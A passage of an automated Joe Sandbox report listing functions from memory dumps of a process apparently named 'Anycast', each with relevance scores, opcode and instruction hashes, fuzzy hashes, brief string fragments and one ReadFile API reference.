                                                                                                                              • Instruction ID: 1cb3fb1da5ba54968795a6599fae36ef0c0e2d4204a05377a307ab63c97fa6f3
                                                                                                                              • Opcode Fuzzy Hash: 375b7e5eda4fd7497718ec4d4e1159de495638cdad29e7c9fd47261541abfd2d
                                                                                                                              • Instruction Fuzzy Hash: F0A131347402198FCB059F79E950A9E7BBBFF88300F108569E8059B3B5DE39AC05CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C32FA49 Relevance: 4.0, Strings: 3, Instructions: 256COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1677 c32fa49-c32fa80 1678 c32fa86-c32fa88 1677->1678 1679 c32fb4d-c32fbd6 1677->1679 1680 c32fa94-c32fa9c 1678->1680 1681 c32fa8a-c32fa91 1678->1681 1708 c32fbd8-c32fbeb 1679->1708 1709 c32fc0f-c32fc17 call c32fd51 1679->1709 1683 c32faaa-c32fabf 1680->1683 1684 c32fa9e-c32faa0 1680->1684 1689 c32fb13-c32fb2c 1683->1689 1690 c32fac1-c32fac4 1683->1690 1684->1683 1695 c32fb37 1689->1695 1696 c32fb2e 1689->1696 1693 c32fac7-c32facf 1690->1693 1697 c32fad1-c32fad3 1693->1697 1698 c32fadd-c32faef 1693->1698 1695->1679 1696->1695 1697->1698 1701 c32faf1-c32faf3 1698->1701 1702 c32fafd-c32fb11 1698->1702 1701->1702 1702->1689 1702->1693 1708->1709 1714 c32fbed-c32fc0d 1708->1714 1710 c32fc1d-c32fc24 1709->1710 1712 c32fcc1-c32fcca 1710->1712 1713 c32fc2a-c32fc2c 1710->1713 1715 c32fc3b-c32fc41 1713->1715 1716 c32fc2e-c32fc33 1713->1716 1714->1709 1718 c32fcf7-c32ff04 1715->1718 1719 c32fc47-c32fc61 1715->1719 1716->1715 1726 c32fc63-c32fc79 1719->1726 1727 c32fcb5-c32fcbb 1719->1727 1732 c32fc91-c32fc98 1726->1732 1733 c32fc7b-c32fc81 1726->1733 1727->1712 1727->1713 1736 c32fca7-c32fcb2 1732->1736 1737 c32fc9a-c32fc9f 1732->1737 1734 c32fc83 1733->1734 1735 c32fc85-c32fc87 1733->1735 1734->1732 1735->1732 1736->1727 1737->1736
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$,aq$,aq
                                                                                                                              • API String ID: 0-3249538566
                                                                                                                              • Opcode ID: 94aa6a41dac02743fbc7d75e757423de770ce535950aef8ed8cd2927de02ff11
                                                                                                                              • Instruction ID: 2360de05e6a403c137f7983ecb0bdfc5f2867560076198e553752b6e7077d73e
                                                                                                                              • Opcode Fuzzy Hash: 94aa6a41dac02743fbc7d75e757423de770ce535950aef8ed8cd2927de02ff11
                                                                                                                              • Instruction Fuzzy Hash: 3891B4357102258FCB14DFA9C594AAEBBF6EF89350B208469D906DB365DB30EC06CB61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C324230 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$(aq$(aq
                                                                                                                              • API String ID: 0-2593664646
                                                                                                                              • Opcode ID: d2a0786eeb5259c65cde2dc170d2ddffec94957b8a4ee87888bfc646febf8293
                                                                                                                              • Instruction ID: 417777a099fb0736384806e7f4c5f5009779fdbd8c6c0323ef14958d011905d1
                                                                                                                              • Opcode Fuzzy Hash: d2a0786eeb5259c65cde2dc170d2ddffec94957b8a4ee87888bfc646febf8293
                                                                                                                              • Instruction Fuzzy Hash: C251C431B141199FDB15DF69C854BEEBBB6EF89300F24806AE905AB394CF349D02CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C324740 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$(aq$(aq
                                                                                                                              • API String ID: 0-2593664646
                                                                                                                              • Opcode ID: 89b2242c285799a1a6b602fa3e9f15e9803c789233e76ee86ee0c6a0a65a5a9d
                                                                                                                              • Instruction ID: 1f5eed13dea97e29ff3f86174e002ae8d987620fffe646c89e22f81ff0e80d0d
                                                                                                                              • Opcode Fuzzy Hash: 89b2242c285799a1a6b602fa3e9f15e9803c789233e76ee86ee0c6a0a65a5a9d
                                                                                                                              • Instruction Fuzzy Hash: 6D41C035B242558FDB19DF38C4546AE7BE6AB89310F2580A9E902DB3A1DF358D01CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C324809 Relevance: 3.8, Strings: 3, Instructions: 51COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$(aq$(aq
                                                                                                                              • API String ID: 0-2593664646
                                                                                                                              • Opcode ID: c78f26b9c84c35ce6875cfbab15deaf7f39f822b469dbb96f45f76423becafa2
                                                                                                                              • Instruction ID: f243313bc6eb57f9ac1b172e3dfb6963fb86c85efa6f7c0a520d0af104a1d46f
                                                                                                                              • Opcode Fuzzy Hash: c78f26b9c84c35ce6875cfbab15deaf7f39f822b469dbb96f45f76423becafa2
                                                                                                                              • Instruction Fuzzy Hash: 0601F935B281564FDB4A9F38942416F3FE3ABE620072580ACDC02DB3D6DE24CD02C796
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C3283D8 Relevance: 3.0, Strings: 2, Instructions: 503COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$d
                                                                                                                              • API String ID: 0-3557608343
                                                                                                                              • Opcode ID: 0fde02d4db01fd52ff6321a801c7e8c97ab2785a42881447537e9fa9ed8a8928
                                                                                                                              • Instruction ID: 9f5559107350f269383cd6f7dc4cf117c87b138c8e69c2de70689cda6b618cf0
                                                                                                                              • Opcode Fuzzy Hash: 0fde02d4db01fd52ff6321a801c7e8c97ab2785a42881447537e9fa9ed8a8928
                                                                                                                              • Instruction Fuzzy Hash: 89124875B102198FCB04CFA9C580A9EBBF2FF89314B258695E915AB365D731EC42CF81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C327DC0 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$d
                                                                                                                              • API String ID: 0-3557608343
                                                                                                                              • Opcode ID: 3b041f9369353002cef7033762d81d89e9cdc7deeb549a91fe3cea860caa1f68
                                                                                                                              • Instruction ID: a0153c52ee732f91280f41c62128160f1c2f1b2d98ff622af6b757b5c053c899
                                                                                                                              • Opcode Fuzzy Hash: 3b041f9369353002cef7033762d81d89e9cdc7deeb549a91fe3cea860caa1f68
                                                                                                                              • Instruction Fuzzy Hash: C0027735B106158FDB14CF19C4809AABBF2FF89314B25C669D45A9B7A6CB30F846CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06DA62D8 Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4464492494.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6da0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: b$p<]q
                                                                                                                              • API String ID: 0-2934331629
                                                                                                                              • Opcode ID: 69918c194cb99a423633ec2e4e67a882f50e2b074cb3bfcbfb7ab46882faaf65
                                                                                                                              • Instruction ID: bcf65c03106d11e206b6768e67c4a065b87a09960e45ad9ff2fabe5cb6fc082d
                                                                                                                              • Opcode Fuzzy Hash: 69918c194cb99a423633ec2e4e67a882f50e2b074cb3bfcbfb7ab46882faaf65
                                                                                                                              • Instruction Fuzzy Hash: 3BE12D75A00215CFCB44DF68C9949AEB7B6FF88300B1585A9E806EB375DB34EC06CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC9CD0 Relevance: 2.7, Strings: 2, Instructions: 237COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$d
                                                                                                                              • API String ID: 0-3557608343
                                                                                                                              • Opcode ID: cf345b9ba66380e30e36e1c1708b6aeced13c307d9bfbe2507203ab849e2f2f9
                                                                                                                              • Instruction ID: 6acadabfa16ad27d1f210f640eddfab1960c266ac9befbb97dc5107fed0f0223
                                                                                                                              • Opcode Fuzzy Hash: cf345b9ba66380e30e36e1c1708b6aeced13c307d9bfbe2507203ab849e2f2f9
                                                                                                                              • Instruction Fuzzy Hash: 24A11634700A058FDB14CF19C58096AB7F2FF89314B26CA59D89A9B765DB30FD42CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C326461 Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$|7=p
                                                                                                                              • API String ID: 0-2831253754
                                                                                                                              • Opcode ID: 0b7dc68251a7360d47a14f70ba1c20894fc8b96e03621e628b5b805aa31cf1ac
                                                                                                                              • Instruction ID: 30343395f81c00f082635cc94d80ae082eb08b862a34a4602a842491ce6b15df
                                                                                                                              • Opcode Fuzzy Hash: 0b7dc68251a7360d47a14f70ba1c20894fc8b96e03621e628b5b805aa31cf1ac
                                                                                                                              • Instruction Fuzzy Hash: 56719C31B002158FCB04DF69D494AAEBBFAFF88310B218569E406DB3A5DB34ED05CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C323318 Relevance: 2.7, Strings: 2, Instructions: 193COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$(aq
                                                                                                                              • API String ID: 0-3916115647
                                                                                                                              • Opcode ID: 2d041d999e3fbb36061e21739cec758cccad1a4cc58fb018d6cc36b3caf426d5
                                                                                                                              • Instruction ID: 1ad8736907f2946a212af7dd84dbd9934e91e514204bcfa71a7f959e0a75cfbc
                                                                                                                              • Opcode Fuzzy Hash: 2d041d999e3fbb36061e21739cec758cccad1a4cc58fb018d6cc36b3caf426d5
                                                                                                                              • Instruction Fuzzy Hash: 2C51A131B102195FCF49DF7998906AEBBEBAFC8210B248469D906DB365DF34DC028B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C325E91 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$4']q
                                                                                                                              • API String ID: 0-4173138025
                                                                                                                              • Opcode ID: 7a906041f884d3ffa194feaa0983a3f8fd2db921c9def6059045f3d94d6ace7d
                                                                                                                              • Instruction ID: 6389e84ee3cc5a92b3f0e6b8548da7bb08bffab93426bccf579fbb8506e25b81
                                                                                                                              • Opcode Fuzzy Hash: 7a906041f884d3ffa194feaa0983a3f8fd2db921c9def6059045f3d94d6ace7d
                                                                                                                              • Instruction Fuzzy Hash: AB51DE303082958FCB19DF79D86059E7FA6BF8630072585AAD445CF3A6DE34CD06CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C32FB4C Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$,aq
                                                                                                                              • API String ID: 0-1929014441
                                                                                                                              • Opcode ID: d997bdf0db33051b39c6883d26858ef1524dbcb0ff90358e343c99c6891e5d8d
                                                                                                                              • Instruction ID: cd74ce3578755cb765c8acccdc6f3f3b9371a0f0d277eda855d9bf70e1703fbe
                                                                                                                              • Opcode Fuzzy Hash: d997bdf0db33051b39c6883d26858ef1524dbcb0ff90358e343c99c6891e5d8d
                                                                                                                              • Instruction Fuzzy Hash: B94160347102258FCB19EF68D89496EB7B2FFC9344B218569D906DB3A5DB30EC06CB61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C32A850 Relevance: 2.6, Strings: 2, Instructions: 127COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$(aq
                                                                                                                              • API String ID: 0-3916115647
                                                                                                                              • Opcode ID: 6c8d7f4b1909bb313502ea5f6991a1ca9ea32499b61da17d6a284178b7590d7d
                                                                                                                              • Instruction ID: 7b736b50462d60b62c437eb7d1625a315503cd199ed0d4f5ff316d6af03036fc
                                                                                                                              • Opcode Fuzzy Hash: 6c8d7f4b1909bb313502ea5f6991a1ca9ea32499b61da17d6a284178b7590d7d
                                                                                                                              • Instruction Fuzzy Hash: 3641C334B042199FCB15CF69C854B9EBBF5EF89210F2580A9D805AB381CE35DD02DFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C323EB0 Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq$(aq
                                                                                                                              • API String ID: 0-3916115647
                                                                                                                              • Opcode ID: 197ddab420316dac66da20439ddcf03043311b1e86a57dd867d7ffc9964f0281
                                                                                                                              • Instruction ID: 3fcf4941f266a24764eaed344c3ed1ce0b5c7d7de062cea4056486c03b28a9a6
                                                                                                                              • Opcode Fuzzy Hash: 197ddab420316dac66da20439ddcf03043311b1e86a57dd867d7ffc9964f0281
                                                                                                                              • Instruction Fuzzy Hash: F53125367142159FCF499F39E8105AE7FBAEF85210B1580AAE906C7361DF34CD02CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC6008 Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $]q$$]q
                                                                                                                              • API String ID: 0-127220927
                                                                                                                              • Opcode ID: 9177e97dcdc55b8cec7dcd132b7166b95eed7fb8a65f6d57da24592f152784e7
                                                                                                                              • Instruction ID: 0b23491e8ed775262146a7143952359eb27189512ed51989efdab81211b99c88
                                                                                                                              • Opcode Fuzzy Hash: 9177e97dcdc55b8cec7dcd132b7166b95eed7fb8a65f6d57da24592f152784e7
                                                                                                                              • Instruction Fuzzy Hash: 7A1193B0304A24CBD7581F6AE2E836FBAB5AB84701F20461EF047D7685CB758D47878A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCCC710 Relevance: 2.5, Strings: 2, Instructions: 18COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $]q$$]q
                                                                                                                              • API String ID: 0-127220927
                                                                                                                              • Opcode ID: ee0a9173f17bee1ea1b5ce8e01951e68e6f41e3a0a43e52536c7faddd970ee28
                                                                                                                              • Instruction ID: a42e14068c2687ebbacaf1b78907471bbae3dfe92feaeaf876f58ce0677ef7d5
                                                                                                                              • Opcode Fuzzy Hash: ee0a9173f17bee1ea1b5ce8e01951e68e6f41e3a0a43e52536c7faddd970ee28
                                                                                                                              • Instruction Fuzzy Hash: 82D02B71B262044FD7B94A2D94A42142BE2BB12600B6608ABC840C6043E71CC505C711
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06DA1AD0 Relevance: 1.7, Strings: 1, Instructions: 480COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4464492494.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6da0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ^q
                                                                                                                              • API String ID: 0-666110857
                                                                                                                              • Opcode ID: 34a130e570cab2d78490474030f540ee0614ca9703bf32f70a369e3473184530
                                                                                                                              • Instruction ID: 3f985f7331cb58e7a76149b6af134f5666e9820659eadd979e5a8adc6c6740b4
                                                                                                                              • Opcode Fuzzy Hash: 34a130e570cab2d78490474030f540ee0614ca9703bf32f70a369e3473184530
                                                                                                                              • Instruction Fuzzy Hash: 6B123934A00216CFCB64DB79D894A9DBBB6FF88304F148569D806AB365DF31ED85CB80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCCF93B Relevance: 1.6, Strings: 1, Instructions: 394COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0qj
                                                                                                                              • API String ID: 0-1080687731
                                                                                                                              • Opcode ID: 953d97e93ed8207108693ca8461e1e38132d54d17f6e90764dbe93a91e75d07f
                                                                                                                              • Instruction ID: 65819a3db5685bd6ecbf7e1046150433d32e481f418672b4326df8e9cfdf7ed6
                                                                                                                              • Opcode Fuzzy Hash: 953d97e93ed8207108693ca8461e1e38132d54d17f6e90764dbe93a91e75d07f
                                                                                                                              • Instruction Fuzzy Hash: 8ED1C262A4E3E55FD703AB789DB04D67F75AE53214B0A01DBC4C0CF1A3E518984EC7AA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06DADC40 Relevance: 1.6, Instructions: 1640COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4464492494.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6da0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9cfa9b80f03c96c07b7aa5500669bf87012939bd323c98a77594fda2e3ae12aa
                                                                                                                              • Instruction ID: e7d87099b10aff28a24af33ba0596475a052b918aa3d98bc609409fbfa0a9ab9
                                                                                                                              • Opcode Fuzzy Hash: 9cfa9b80f03c96c07b7aa5500669bf87012939bd323c98a77594fda2e3ae12aa
                                                                                                                              • Instruction Fuzzy Hash: 1BF2AEB9654B008FC7A8DF28C488A19B7F2FF49705B1589A9E56ACB771DB30F844CB11
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC2738 Relevance: 1.6, Strings: 1, Instructions: 352COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq
                                                                                                                              • API String ID: 0-600464949
                                                                                                                              • Opcode ID: 2d3c58094808fdbd2f9ea1996feeb506a324c2f8ba533b42433c0033c2559c81
                                                                                                                              • Instruction ID: cfcfc174526ccb6acba366c58c00f87d811482823b068e620812a5ebf1af5cbd
                                                                                                                              • Opcode Fuzzy Hash: 2d3c58094808fdbd2f9ea1996feeb506a324c2f8ba533b42433c0033c2559c81
                                                                                                                              • Instruction Fuzzy Hash: 27E17D71B1020A8FCB15DF68C594AADBBF6FF49300F1582A9E905AB365EB30ED45CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06DA1AC0 Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4464492494.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6da0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ^q
                                                                                                                              • API String ID: 0-666110857
                                                                                                                              • Opcode ID: 48119785ceed7120afc9f543a7ca69127e714855b95f0dd2507870422a4e3a63
                                                                                                                              • Instruction ID: d4e2153de5e2268406abd9fbd4ba114bbd650b3c87cc39e2fd6a50acbfa19d68
                                                                                                                              • Opcode Fuzzy Hash: 48119785ceed7120afc9f543a7ca69127e714855b95f0dd2507870422a4e3a63
                                                                                                                              • Instruction Fuzzy Hash: F7E12A34A0031ACFCB64DB75D894A9DBBB6FF84304F148569D806AB365DF34E986CB80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C32F050 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (Abq
                                                                                                                              • API String ID: 0-1163130805
                                                                                                                              • Opcode ID: 4ad711f4ae36cb48607c47583f427be7fac481f847990c01fffa5ceaaf890f7b
                                                                                                                              • Instruction ID: 24964638d5617c90e59488435526a90d6b06793d688e03d8b5ed65bfce7300c8
                                                                                                                              • Opcode Fuzzy Hash: 4ad711f4ae36cb48607c47583f427be7fac481f847990c01fffa5ceaaf890f7b
                                                                                                                              • Instruction Fuzzy Hash: 7BC13C34B202299FCF14DFA5D954AAEBBB6BF88300F248529D406EB355DB749C06CF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06E20DCE Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNEL32(00000000,?,?,?,?), ref: 06E20E68
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4465300679.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6e20000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: 5fbb6daeaed518fcf816db9612044429956b607ce671a7dc925b6d924c51e694
                                                                                                                              • Instruction ID: 1c81671ae6bf1431a94a1093016d4e0b263a8f5b6bda338da33fad841bbe6358
                                                                                                                              • Opcode Fuzzy Hash: 5fbb6daeaed518fcf816db9612044429956b607ce671a7dc925b6d924c51e694
                                                                                                                              • Instruction Fuzzy Hash: 433102B1D00258EFCB20DF99C984A9EBFF6BF48310F24805AE408A7350C7749881CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06E20DD8 Relevance: 1.6, APIs: 1, Instructions: 68fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNEL32(00000000,?,?,?,?), ref: 06E20E68
                                                                                                                              Memory Dump Source
